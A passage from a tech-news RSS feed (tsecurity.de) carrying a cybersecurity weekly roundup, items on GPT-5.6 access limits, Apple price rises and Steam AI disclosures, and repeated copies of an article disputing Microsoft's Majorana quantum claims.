<content:encoded><![CDATA[<p><img width="1225" height="766" src="https://thecyberexpress.com/wp-content/uploads/The-Cyber-Express-weekly-roundup-June-2026.webp" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="The Cyber Express weekly roundup June 2026" decoding="async" srcset="https://thecyberexpress.com/wp-content/uploads/The-Cyber-Express-weekly-roundup-June-2026.webp 1225w, https://thecyberexpress.com/wp-content/uploads/The-Cyber-Express-weekly-roundup-June-2026-300x188.webp 300w, https://thecyberexpress.com/wp-content/uploads/The-Cyber-Express-weekly-roundup-June-2026-1024x640.webp 1024w, https://thecyberexpress.com/wp-content/uploads/The-Cyber-Express-weekly-roundup-June-2026-768x480.webp 768w, https://thecyberexpress.com/wp-content/uploads/The-Cyber-Express-weekly-roundup-June-2026-600x375.webp 600w, https://thecyberexpress.com/wp-content/uploads/The-Cyber-Express-weekly-roundup-June-2026-150x94.webp 150w, https://thecyberexpress.com/wp-content/uploads/The-Cyber-Express-weekly-roundup-June-2026-750x469.webp 750w, https://thecyberexpress.com/wp-content/uploads/The-Cyber-Express-weekly-roundup-June-2026-1140x713.webp 1140w, https://thecyberexpress.com/wp-content/uploads/The-Cyber-Express-weekly-roundup-June-2026.webp 1225w, https://thecyberexpress.com/wp-content/uploads/The-Cyber-Express-weekly-roundup-June-2026-300x188.webp 300w, https://thecyberexpress.com/wp-content/uploads/The-Cyber-Express-weekly-roundup-June-2026-1024x640.webp 1024w, https://thecyberexpress.com/wp-content/uploads/The-Cyber-Express-weekly-roundup-June-2026-768x480.webp 768w, https://thecyberexpress.com/wp-content/uploads/The-Cyber-Express-weekly-roundup-June-2026-600x375.webp 600w, https://thecyberexpress.com/wp-content/uploads/The-Cyber-Express-weekly-roundup-June-2026-150x94.webp 150w, https://thecyberexpress.com/wp-content/uploads/The-Cyber-Express-weekly-roundup-June-2026-750x469.webp 750w, https://thecyberexpress.com/wp-content/uploads/The-Cyber-Express-weekly-roundup-June-2026-1140x713.webp 1140w" sizes="(max-width: 1225px) 100vw, 1225px" title="The Cyber Express Weekly Roundup: Five Eyes AI Warning, KDDI Data Breach, Garfield AI Legal Milestone, and Iranian Hacker Arrest 1"></p><span data-contrast="auto">This week’s weekly roundup of cybersecurity developments highlights a rapid shift in global cyber risk conditions driven by artificial intelligence acceleration, large-scale data breaches, and expanding international enforcement actions. Across infrastructure, enterprise systems, public services, and regulated AI applications, organizations are increasingly exposed to faster-moving threats where traditional security assumptions are being challenged by automation and long-term intrusion campaigns.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">The overarching theme in this weekly roundup is the erosion of response time in modern <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-cybersecurity/" title="cybersecurity" data-wpil-keyword-link="linked" data-wpil-monitor-id="28834">cybersecurity</a> environments. Intelligence agencies, law enforcement bodies, and private-sector disclosures collectively point to a landscape where attackers are leveraging AI-enabled capabilities, third-party system weaknesses, and identity compromise to gain persistence across networks. At the same time, regulators and courts are beginning to define new boundaries for both <a class="wpil_keyword_link" href="https://cyble.com/cybercrime/" target="_blank" rel="noopener" title="cybercrime" data-wpil-keyword-link="linked" data-wpil-monitor-id="28836">cybercrime</a> accountability and the operational use of AI in sensitive domains.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>
<h3 aria-level="2"><b><span data-contrast="none">The Cyber Express Weekly Roundup</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h3>
<h4 aria-level="3"><b><span data-contrast="none">Five Eyes Warn AI Is Rapidly Outdating Cyber Risk Models</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h4>
<span data-contrast="auto">The Five Eyes cybersecurity agencies warn that artificial intelligence is accelerating cyber threats and making traditional cyber <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-are-risks-in-cybersecurity/" title="risk" data-wpil-keyword-link="linked" data-wpil-monitor-id="28837">risk</a> assumptions obsolete. Attackers are exploiting <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-are-vulnerabilities/" title="vulnerabilities" data-wpil-keyword-link="linked" data-wpil-monitor-id="28839">vulnerabilities</a> faster, shrinking response windows, and increasing the speed and sophistication of attacks. In guidance issued on June 23, 2026, they urged organizations to treat <a class="wpil_keyword_link" href="https://thecyberexpress.com/cyber-news/" title="cyber" data-wpil-keyword-link="linked" data-wpil-monitor-id="28842">cyber</a> resilience as a leadership priority, strengthen identity and access controls, accelerate patching cycles, and reduce dependence on legacy systems. </span><strong><a href="https://thecyberexpress.com/ai-cyber-risk-warning/"><i>Read more…</i></a> </strong>
<h4 aria-level="3"><b><span data-contrast="none">TfL Hackers Plead Guilty After £29M Cyberattack</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h4>
<span data-contrast="auto">Two members of the <a href="https://cyble.com/threat-actor-profiles/scattered-spider/" target="_blank" rel="nofollow noopener">Scattered Spider</a> cybercrime group have pleaded guilty to roles in the Transport for London cyberattack that caused £29 million in losses, disrupted services, and exposed customer data. The 2024 breach affected Oyster systems and forced mass password resets across TfL’s workforce. Investigators also linked the suspects to other attempted intrusions targeting U.S. healthcare networks. </span><strong><a href="https://thecyberexpress.com/transport-for-london-cyberattack-plead-guilty/"><i>Read more…</i></a> </strong>
<h4 aria-level="3"><b><span data-contrast="none">KDDI Data Breach May Expose 14.22 Million Email Accounts</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h4>
<span data-contrast="auto">KDDI has disclosed a cybersecurity incident that may have exposed up to 14.22 million email addresses and passwords through systems used by multiple Japanese <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-internet/" title="internet" data-wpil-keyword-link="linked" data-wpil-monitor-id="28841">internet</a> service providers. The breach, detected on June 17, 2026, stemmed from unauthorized access to a third-party email system. KDDI said it has secured the affected environment, notified partners, and is working with regulators while urging users to reset passwords as a precaution. </span><strong><a href="https://thecyberexpress.com/kddi-data-breach-14-million-email-leak-2026/"><i>Read more…</i></a> </strong>
<h4 aria-level="3"><b><span data-contrast="none">Garfield AI Wins Landmark UK Case as AI-Powered Law Firm</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h4>
<span data-contrast="auto">Garfield AI, a UK-regulated AI-powered law firm, has secured a landmark legal victory after successfully managing a small claims case in England with minimal human intervention. The AI system handled pre-trial work, including drafting court documents and preparing evidence, in a dispute over an unpaid £7,000 invoice. The case was ultimately won at Wandsworth County Court, marking a notable milestone for the use of AI in regulated legal services, though human counsel still represented the claimant at trial. </span><strong><a href="https://thecyberexpress.com/ai-powered-law-firm-wins-court-case/"><i>Read more…</i></a> </strong>
<h4 aria-level="3"><b><span data-contrast="none">Iranian Hacker Arrested in Montenegro Over Alleged $3.4B Cyberattack Campaign</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h4>
<span data-contrast="auto">An alleged Iranian <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-a-hacker/" title="hacker" data-wpil-keyword-link="linked" data-wpil-monitor-id="28838">hacker</a> has been arrested in Montenegro following a joint operation with the FBI over a long-running cyber campaign targeting U.S. infrastructure. Authorities say the 39-year-old suspect is linked to attacks dating back to 2013, allegedly targeting more than 150 U.S. universities and causing over $3.4 billion in damages. He now faces extradition to the United States on charges including computer fraud, <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-hacking/" title="hacking" data-wpil-keyword-link="linked" data-wpil-monitor-id="28835">hacking</a>, conspiracy, and identity theft, while investigations into Iran-linked cyber activity continue. </span><strong><a href="https://thecyberexpress.com/iranian-hacker-arrested/"><i>Read more…</i></a> </strong>
<h3 aria-level="2"><b><span data-contrast="none">Weekly Cybersecurity Takeaway</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h3>
<span data-contrast="auto">This week’s weekly roundup reflects a cybersecurity environment increasingly defined by the speed of AI-driven threat evolution, the scale of third-party exposure, and the persistence of long-running cybercrime operations. From the Five Eyes warning that artificial intelligence is rapidly reshaping cyber risk assumptions to the KDDI breach that may have exposed 14.22 million email accounts, organizations are facing mounting pressure to modernize defenses while reducing dependence on outdated <a class="wpil_keyword_link" href="https://thecyberexpress.com/" title="security" data-wpil-keyword-link="linked" data-wpil-monitor-id="28840">security</a> models.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI's GPT 5.6 rollout now requires US government approval on a "customer by customer basis"]]></title>
<description><![CDATA[At the request of the U.S. government, OpenAI will initially make its new GPT-5.6 model available only to select partners, with access approved on a "customer by customer" basis. CEO Sam Altman says this isn't a "preferred long term model." After the forced takedown of Anthropic's Fable, AI labs ...]]></description>
<link>https://tsecurity.de/de/3626817/ai-nachrichten/openais-gpt-56-rollout-now-requires-us-government-approval-on-a-customer-by-customer-basis/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3626817/ai-nachrichten/openais-gpt-56-rollout-now-requires-us-government-approval-on-a-customer-by-customer-basis/</guid>
<pubDate>Fri, 26 Jun 2026 10:49:11 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1376" height="768" src="https://the-decoder.com/wp-content/uploads/2026/06/white_house_ai_firms.png" class="attachment-full size-full wp-post-image" alt="" decoding="async" fetchpriority="high"></p>
<p>        At the request of the U.S. government, OpenAI will initially make its new GPT-5.6 model available only to select partners, with access approved on a "customer by customer" basis. CEO Sam Altman says this isn't a "preferred long term model." After the forced takedown of Anthropic's Fable, AI labs are afraid of a de facto licensing regime for AI models.</p>
<p>The article <a href="https://the-decoder.com/openais-gpt-5-6-rollout-now-requires-us-government-approval-on-a-customer-by-customer-basis/">OpenAI's GPT 5.6 rollout now requires US government approval on a "customer by customer basis"</a> appeared first on <a href="https://the-decoder.com/">The Decoder</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple Says It Can No Longer “Shield Customers” From Rising Memory Chip Costs]]></title>
<description><![CDATA[Apple has officially explained why it increased prices across much of its product lineup, confirming that rising memory chip costs forced the company to charge more for several devices. The latest price hike affects Macs, iPads, Apple TV, HomePod, HomePod mini, and Vision Pro, while iPhone, Apple...]]></description>
<link>https://tsecurity.de/de/3626321/ios-mac-os/apple-says-it-can-no-longer-shield-customers-from-rising-memory-chip-costs/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3626321/ios-mac-os/apple-says-it-can-no-longer-shield-customers-from-rising-memory-chip-costs/</guid>
<pubDate>Fri, 26 Jun 2026 07:08:24 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple has officially explained why it increased prices across much of its product lineup, confirming that rising memory chip costs forced the company to charge more for several devices. The latest price hike affects Macs, iPads, Apple TV, HomePod, HomePod mini, and Vision Pro, while iPhone, Apple Watch, and AirPods prices remain unchanged for now.



MacRumors shared Apple's statement, which points to an ongoing shortage of RAM and SSD storage chips as the main reason behind the increase. According to the company, the rapid expansion of AI data centers has created exceptionally high demand for memory components, pushing prices higher across the technology industry.



Apple Says Memory Chip Costs Continue to Rise



Apple said the company had absorbed higher component costs for as long as possible before making this decision.




"The consumer electronics industry is facing an unprecedented challenge. The rapid expansion of AI data centers has created an extraordinary surge in demand for memory and storage. We have never seen a component price increase this much, this quickly. We have shielded our customers from these increases so far, but we have now reached a point where we need to begin raising prices on a number of products, including today's increases for iPad and Mac. We know this is not welcome news, and we are working tirelessly to find solutions."




Last week, Apple CEO Tim Cook also described price increases as "unavoidable," adding further support to the company's latest decision. Apple also noted that it is only beginning to raise prices, which suggests additional increases remain possible if memory costs stay high. At the same time, the company said it continues working on solutions that could help reduce prices in the future if supply conditions improve.



Apple is not alone in responding to higher memory costs, as Microsoft, Samsung, Lenovo, HP, and Dell have also increased prices during the ongoing chip shortage. Meanwhile, memory supplier Micron expects supply constraints to continue through 2027, which means higher prices across the PC and consumer electronics market are likely to remain for some time.]]></content:encoded>
</item>
<item>
<title><![CDATA["A hater community trying to kill the game": Epic Games CEO speaks out against Steam's forced AI disclosure policy and how it's harming developers]]></title>
<description><![CDATA[Epic Games CEO Tim Sweeney is not shy about taking shots at Steam, and in a recent interview, he talks about how forced AI disclosures on Valve's mega storefront are harming developers. He makes some good points, but keep in mind this is the same guy spearheading the AI-infused Unreal Engine 6.]]></description>
<link>https://tsecurity.de/de/3625862/windows-tipps/a-hater-community-trying-to-kill-the-game-epic-games-ceo-speaks-out-against-steams-forced-ai-disclosure-policy-and-how-its-harming-developers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3625862/windows-tipps/a-hater-community-trying-to-kill-the-game-epic-games-ceo-speaks-out-against-steams-forced-ai-disclosure-policy-and-how-its-harming-developers/</guid>
<pubDate>Thu, 25 Jun 2026 23:07:44 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Epic Games CEO Tim Sweeney is not shy about taking shots at Steam, and in a recent interview, he talks about how forced AI disclosures on Valve's mega storefront are harming developers. He makes some good points, but keep in mind this is the same guy spearheading the AI-infused Unreal Engine 6.]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple's price hike choice almost guarantees more expensive iPhones as the RAM crisis is far from over: 'We are not at the bottom and will take more time to climb out,' expert says]]></title>
<description><![CDATA[The RAM crisis forced Apple's hand, and the price hikes we just experienced will likely be repeated when all the new iPhones arrive in September.]]></description>
<link>https://tsecurity.de/de/3625691/it-nachrichten/apples-price-hike-choice-almost-guarantees-more-expensive-iphones-as-the-ram-crisis-is-far-from-over-we-are-not-at-the-bottom-and-will-take-more-time-to-climb-out-expert-says/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3625691/it-nachrichten/apples-price-hike-choice-almost-guarantees-more-expensive-iphones-as-the-ram-crisis-is-far-from-over-we-are-not-at-the-bottom-and-will-take-more-time-to-climb-out-expert-says/</guid>
<pubDate>Thu, 25 Jun 2026 21:17:38 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The RAM crisis forced Apple's hand, and the price hikes we just experienced will likely be repeated when all the new iPhones arrive in September.]]></content:encoded>
</item>
<item>
<title><![CDATA[Researchers cast new doubt on Microsoft’s quantum computing advance]]></title>
<description><![CDATA[Microsoft’s controversial claim that its Majorana chip program will make possible a scalable quantum computer by 2029 has been thrown into new doubt by a scientific paper that questions whether the company has correctly interpreted its own experimental evidence.



According to a peer-reviewed pa...]]></description>
<link>https://tsecurity.de/de/3625602/it-security-nachrichten/researchers-cast-new-doubt-on-microsofts-quantum-computing-advance/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3625602/it-security-nachrichten/researchers-cast-new-doubt-on-microsofts-quantum-computing-advance/</guid>
<pubDate>Thu, 25 Jun 2026 20:22:30 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Microsoft’s controversial claim that its Majorana chip program will make possible a scalable quantum computer by 2029 has been thrown into new doubt by a scientific paper that questions whether the company has correctly interpreted its own experimental evidence.</p>



<p>According to a peer-reviewed <a href="https://dmscdn.vuelio.co.uk/publicitem/6231f335-786b-476c-806b-8fce27e39ec6" target="_blank" rel="noreferrer noopener">paper</a> by <a href="https://www.st-andrews.ac.uk/physics-astronomy/people/hl29/" target="_blank" rel="noreferrer noopener">Dr. Henry Legg</a> from the University of St Andrews, published this week in <em>Nature</em>, Microsoft’s Topological Gap Protocol (TGP) framework, designed to infer the existence of quantum states in theorized Majorana particles, is flawed.</p>



<p>“Last year Microsoft claimed they had built the equivalent of a precision Swiss watch. However, when I opened the case to examine the mechanism, I found what looked like a chaotic jumble of mismatched parts,” <a href="https://news.st-andrews.ac.uk/archive/critique-published-by-nature-challenges-microsofts-quantum-computing-claims" target="_blank" rel="noreferrer noopener">said Legg</a>.</p>



<p>He believed the results gathered from Microsoft’s TGP software data analysis could also be explained by other effects, as well as being skewed by the data chosen for analysis. Because of this, he believed the company’s researchers had jumped to the wrong conclusions.</p>



<p>“Something was making noise, but it didn’t look like the breakthrough Microsoft had claimed. Despite the headlines, the vast majority of scientists in the field were skeptical of Microsoft’s claim from the start; my critique simply backs up that skepticism in the scientific record,” he said.</p>



<h2 class="wp-block-heading">Topological qubits</h2>



<p>The ability to create Majorana ‘zero modes’ that resist the errors suffered by traditional qubit-based designs is fundamental to Microsoft’s entire quantum computing strategy, stretching back two decades. This, of course, assumes the existence of subatomic Majorana fermions, named after the Italian physicist who first proposed them in 1937. To this day, they remain only theoretical.</p>



<p>In 2018, Microsoft said its researchers had detected evidence of their existence, an apparently major breakthrough it was forced to retract when the data was successfully challenged. Nature’s editors subsequently backed this up with the blunt note: “The results in this manuscript do not represent evidence for the presence of Majorana zero modes in the reported devices.”</p>



<p>Despite the setback, Microsoft persisted, in 2025 publishing a new paper in <em>Nature</em> that claimed the company had worked out how to exploit the principle in a new “transistor for the quantum age,” the <a href="https://www.networkworld.com/article/3827995/microsoft-braids-anyons-into-topological-cubits-on-new-majorana-quantum-chip.html" target="_blank">Majorana 1 chip</a>.</p>



<p>Earlier this month, the company launched its successor, <a href="https://news.microsoft.com/source/features/innovation/majorana-2-microsoft-discovery-agentic-ai/" target="_blank" rel="noreferrer noopener">Majorana 2</a>, claiming that AI had helped to achieve a 1,000-fold improvement in reliability compared to the earlier chip. “With this progress, the team now expects to achieve a scalable quantum computer by 2029, cutting its original timeline in half,” the company announced.  </p>



<p>However, Microsoft again finds itself on the defensive after the latest criticism from Legg, who said, “I am simply reflecting what most in the field felt from the initial announcement. I felt that I needed to put these concerns into a formal scientific critique. It is good that it has now been peer-reviewed and published.”</p>



<p>His criticism relates to the transport data system, not the raw experimental data itself, which Microsoft had yet to make fully public in a way that would allow independent analysis.</p>



<h2 class="wp-block-heading">Microsoft still confident</h2>



<p>Microsoft said by email that it remains confident that the Majorana has brought usable quantum computing a step closer, pointing to its collaboration with DARPA as part of the <a href="https://www.darpa.mil/research/programs/underexplored-systems-for-utility-scale-quantum-computing" target="_blank" rel="noreferrer noopener">Underexplored Systems for Utility-Scale Quantum Computing (US2QC)</a> program.</p>



<p>“We stand by our results and our roadmap,” said technical fellow and vice president of quantum hardware, <a href="https://www.linkedin.com/in/cnayak-quantum/" target="_blank" rel="noreferrer noopener">Dr. Chetan Nayak</a>. “At the end of the day, success is the delivery of a scalable quantum computer. We are confident in our ability to execute against our roadmap.”</p>



<p>“Skepticism and rigor are hallmarks of the scientific process, which we appreciate and have supported from various academics,” he added. “We have participated in dialogue and our <a href="https://arxiv.org/abs/2504.13240" target="_blank" rel="noreferrer noopener">thorough rebuttal</a> was accepted and published by Nature.”</p>



<p>Microsoft is not the only company researching quantum computing hardware, with <a href="https://www.networkworld.com/article/4088709/top-quantum-breakthroughs-of-2025.html#:~:text=6.%20New%20hardware%20breakthroughs%20in%20size%20and%20qubit%20types" target="_blank">Google, IBM, and Amazon also working on designs</a>. But even if the hardware matures on the schedule claimed by Microsoft,  many believe the gap between technology and implementation inside enterprises could be more of <a href="https://www.infoworld.com/article/3836942/does-microsofts-majorana-chip-meet-enterprise-needs.html" target="_blank">a slow burn than a sudden jump forward</a>.</p>



<p></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Researchers cast new doubt on Microsoft’s quantum computing advance]]></title>
<description><![CDATA[Microsoft’s controversial claim that its Majorana chip program will make possible a scalable quantum computer by 2029 has been thrown into new doubt by a scientific paper that questions whether the company has correctly interpreted its own experimental evidence.



According to a peer-reviewed pa...]]></description>
<link>https://tsecurity.de/de/3625594/it-nachrichten/researchers-cast-new-doubt-on-microsofts-quantum-computing-advance/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3625594/it-nachrichten/researchers-cast-new-doubt-on-microsofts-quantum-computing-advance/</guid>
<pubDate>Thu, 25 Jun 2026 20:17:18 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Microsoft’s controversial claim that its Majorana chip program will make possible a scalable quantum computer by 2029 has been thrown into new doubt by a scientific paper that questions whether the company has correctly interpreted its own experimental evidence.</p>



<p>According to a peer-reviewed <a href="https://dmscdn.vuelio.co.uk/publicitem/6231f335-786b-476c-806b-8fce27e39ec6" target="_blank" rel="noreferrer noopener">paper</a> by <a href="https://www.st-andrews.ac.uk/physics-astronomy/people/hl29/" target="_blank" rel="noreferrer noopener">Dr. Henry Legg</a> from the University of St Andrews, published this week in <em>Nature</em>, Microsoft’s Topological Gap Protocol (TGP) framework, designed to infer the existence of quantum states in theorized Majorana particles, is flawed.</p>



<p>“Last year Microsoft claimed they had built the equivalent of a precision Swiss watch. However, when I opened the case to examine the mechanism, I found what looked like a chaotic jumble of mismatched parts,” <a href="https://news.st-andrews.ac.uk/archive/critique-published-by-nature-challenges-microsofts-quantum-computing-claims" target="_blank" rel="noreferrer noopener">said Legg</a>.</p>



<p>He believed the results gathered from Microsoft’s TGP software data analysis could also be explained by other effects, as well as being skewed by the data chosen for analysis. Because of this, he believed the company’s researchers had jumped to the wrong conclusions.</p>



<p>“Something was making noise, but it didn’t look like the breakthrough Microsoft had claimed. Despite the headlines, the vast majority of scientists in the field were skeptical of Microsoft’s claim from the start; my critique simply backs up that skepticism in the scientific record,” he said.</p>



<h2 class="wp-block-heading">Topological qubits</h2>



<p>The ability to create Majorana ‘zero modes’ that resist the errors suffered by traditional qubit-based designs is fundamental to Microsoft’s entire quantum computing strategy, stretching back two decades. This, of course, assumes the existence of subatomic Majorana fermions, named after the Italian physicist who first proposed them in 1937. To this day, they remain only theoretical.</p>



<p>In 2018, Microsoft said its researchers had detected evidence of their existence, an apparently major breakthrough it was forced to retract when the data was successfully challenged. Nature’s editors subsequently backed this up with the blunt note: “The results in this manuscript do not represent evidence for the presence of Majorana zero modes in the reported devices.”</p>



<p>Despite the setback, Microsoft persisted, in 2025 publishing a new paper in <em>Nature</em> that claimed the company had worked out how to exploit the principle in a new “transistor for the quantum age,” the <a href="https://www.networkworld.com/article/3827995/microsoft-braids-anyons-into-topological-cubits-on-new-majorana-quantum-chip.html" target="_blank">Majorana 1 chip</a>.</p>



<p>Earlier this month, the company launched its successor, <a href="https://news.microsoft.com/source/features/innovation/majorana-2-microsoft-discovery-agentic-ai/" target="_blank" rel="noreferrer noopener">Majorana 2</a>, claiming that AI had helped to achieve a 1,000-fold improvement in reliability compared to the earlier chip. “With this progress, the team now expects to achieve a scalable quantum computer by 2029, cutting its original timeline in half,” the company announced.  </p>



<p>However, Microsoft again finds itself on the defensive after the latest criticism from Legg, who said, “I am simply reflecting what most in the field felt from the initial announcement. I felt that I needed to put these concerns into a formal scientific critique. It is good that it has now been peer-reviewed and published.”</p>



<p>His criticism relates to the transport data system, not the raw experimental data itself, which Microsoft had yet to make fully public in a way that would allow independent analysis.</p>



<h2 class="wp-block-heading">Microsoft still confident</h2>



<p>Microsoft said by email that it remains confident that the Majorana has brought usable quantum computing a step closer, pointing to its collaboration with DARPA as part of the <a href="https://www.darpa.mil/research/programs/underexplored-systems-for-utility-scale-quantum-computing" target="_blank" rel="noreferrer noopener">Underexplored Systems for Utility-Scale Quantum Computing (US2QC)</a> program.</p>



<p>“We stand by our results and our roadmap,” said technical fellow and vice president of quantum hardware, <a href="https://www.linkedin.com/in/cnayak-quantum/" target="_blank" rel="noreferrer noopener">Dr. Chetan Nayak</a>. “At the end of the day, success is the delivery of a scalable quantum computer. We are confident in our ability to execute against our roadmap.”</p>



<p>“Skepticism and rigor are hallmarks of the scientific process, which we appreciate and have supported from various academics,” he added. “We have participated in dialogue and our <a href="https://arxiv.org/abs/2504.13240" target="_blank" rel="noreferrer noopener">thorough rebuttal</a> was accepted and published by Nature.”</p>



<p>Microsoft is not the only company researching quantum computing hardware, with <a href="https://www.networkworld.com/article/4088709/top-quantum-breakthroughs-of-2025.html#:~:text=6.%20New%20hardware%20breakthroughs%20in%20size%20and%20qubit%20types" target="_blank">Google, IBM, and Amazon also working on designs</a>. But even if the hardware matures on the schedule claimed by Microsoft,  many believe the gap between technology and implementation inside enterprises could be more of <a href="https://www.infoworld.com/article/3836942/does-microsofts-majorana-chip-meet-enterprise-needs.html" target="_blank">a slow burn than a sudden jump forward</a>.</p>



<p><em>This article originally appeared on <a href="https://www.networkworld.com/article/4189610/researchers-cast-new-doubt-on-microsofts-quantum-computing-advance.html" target="_blank">NetworkWorld</a>.</em></p>



<p></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Researchers cast new doubt on Microsoft’s quantum computing advance]]></title>
<description><![CDATA[Microsoft’s controversial claim that its Majorana chip program will make possible a scalable quantum computer by 2029 has been thrown into new doubt by a scientific paper that questions whether the company has correctly interpreted its own experimental evidence.



According to a peer-reviewed pa...]]></description>
<link>https://tsecurity.de/de/3625592/it-nachrichten/researchers-cast-new-doubt-on-microsofts-quantum-computing-advance/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3625592/it-nachrichten/researchers-cast-new-doubt-on-microsofts-quantum-computing-advance/</guid>
<pubDate>Thu, 25 Jun 2026 20:17:15 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Microsoft’s controversial claim that its Majorana chip program will make possible a scalable quantum computer by 2029 has been thrown into new doubt by a scientific paper that questions whether the company has correctly interpreted its own experimental evidence.</p>



<p>According to a peer-reviewed <a href="https://dmscdn.vuelio.co.uk/publicitem/6231f335-786b-476c-806b-8fce27e39ec6" target="_blank" rel="nofollow">paper</a> by <a href="https://www.st-andrews.ac.uk/physics-astronomy/people/hl29/" target="_blank" rel="nofollow">Dr. Henry Legg</a> from the University of St Andrews, published this week in <em>Nature</em>, Microsoft’s Topological Gap Protocol (TGP) framework, designed to infer the existence of quantum states in theorized Majorana particles, is flawed.</p>



<p>“Last year Microsoft claimed they had built the equivalent of a precision Swiss watch. However, when I opened the case to examine the mechanism, I found what looked like a chaotic jumble of mismatched parts,” <a href="https://news.st-andrews.ac.uk/archive/critique-published-by-nature-challenges-microsofts-quantum-computing-claims" target="_blank" rel="nofollow">said Legg</a>.</p>



<p>He believed the results gathered from Microsoft’s TGP software data analysis could also be explained by other effects, as well as being skewed by the data chosen for analysis. Because of this, he believed the company’s researchers had jumped to the wrong conclusions.</p>



<p>“Something was making noise, but it didn’t look like the breakthrough Microsoft had claimed. Despite the headlines, the vast majority of scientists in the field were skeptical of Microsoft’s claim from the start; my critique simply backs up that skepticism in the scientific record,” he said.</p>



<h2 class="wp-block-heading">Topological qubits</h2>



<p>The ability to create Majorana ‘zero modes’ that resist the errors suffered by traditional qubit-based designs is fundamental to Microsoft’s entire quantum computing strategy, stretching back two decades. This, of course, assumes the existence of subatomic Majorana fermions, named after the Italian physicist who first proposed them in 1937. To this day, they remain only theoretical.</p>



<p>In 2018, Microsoft said its researchers had detected evidence of their existence, an apparently major breakthrough it was forced to retract when the data was successfully challenged. Nature’s editors subsequently backed this up with the blunt note: “The results in this manuscript do not represent evidence for the presence of Majorana zero modes in the reported devices.”</p>



<p>Despite the setback, Microsoft persisted, in 2025 publishing a new paper in <em>Nature</em> that claimed the company had worked out how to exploit the principle in a new “transistor for the quantum age,” the <a href="https://www.networkworld.com/article/3827995/microsoft-braids-anyons-into-topological-cubits-on-new-majorana-quantum-chip.html" target="_blank">Majorana 1 chip</a>.</p>



<p>Earlier this month, the company launched its successor, <a href="https://news.microsoft.com/source/features/innovation/majorana-2-microsoft-discovery-agentic-ai/" target="_blank" rel="nofollow">Majorana 2</a>, claiming that AI had helped to achieve a 1,000-fold improvement in reliability compared to the earlier chip. “With this progress, the team now expects to achieve a scalable quantum computer by 2029, cutting its original timeline in half,” the company announced.  </p>



<p>However, Microsoft again finds itself on the defensive after the latest criticism from Legg, who said, “I am simply reflecting what most in the field felt from the initial announcement. I felt that I needed to put these concerns into a formal scientific critique. It is good that it has now been peer-reviewed and published.”</p>



<p>His criticism relates to the transport data system, not the raw experimental data itself, which Microsoft had yet to make fully public in a way that would allow independent analysis.</p>



<h2 class="wp-block-heading">Microsoft still confident</h2>



<p>Microsoft said by email that it remains confident that the Majorana has brought usable quantum computing a step closer, pointing to its collaboration with DARPA as part of the <a href="https://www.darpa.mil/research/programs/underexplored-systems-for-utility-scale-quantum-computing" target="_blank" rel="nofollow">Underexplored Systems for Utility-Scale Quantum Computing (US2QC)</a> program.</p>



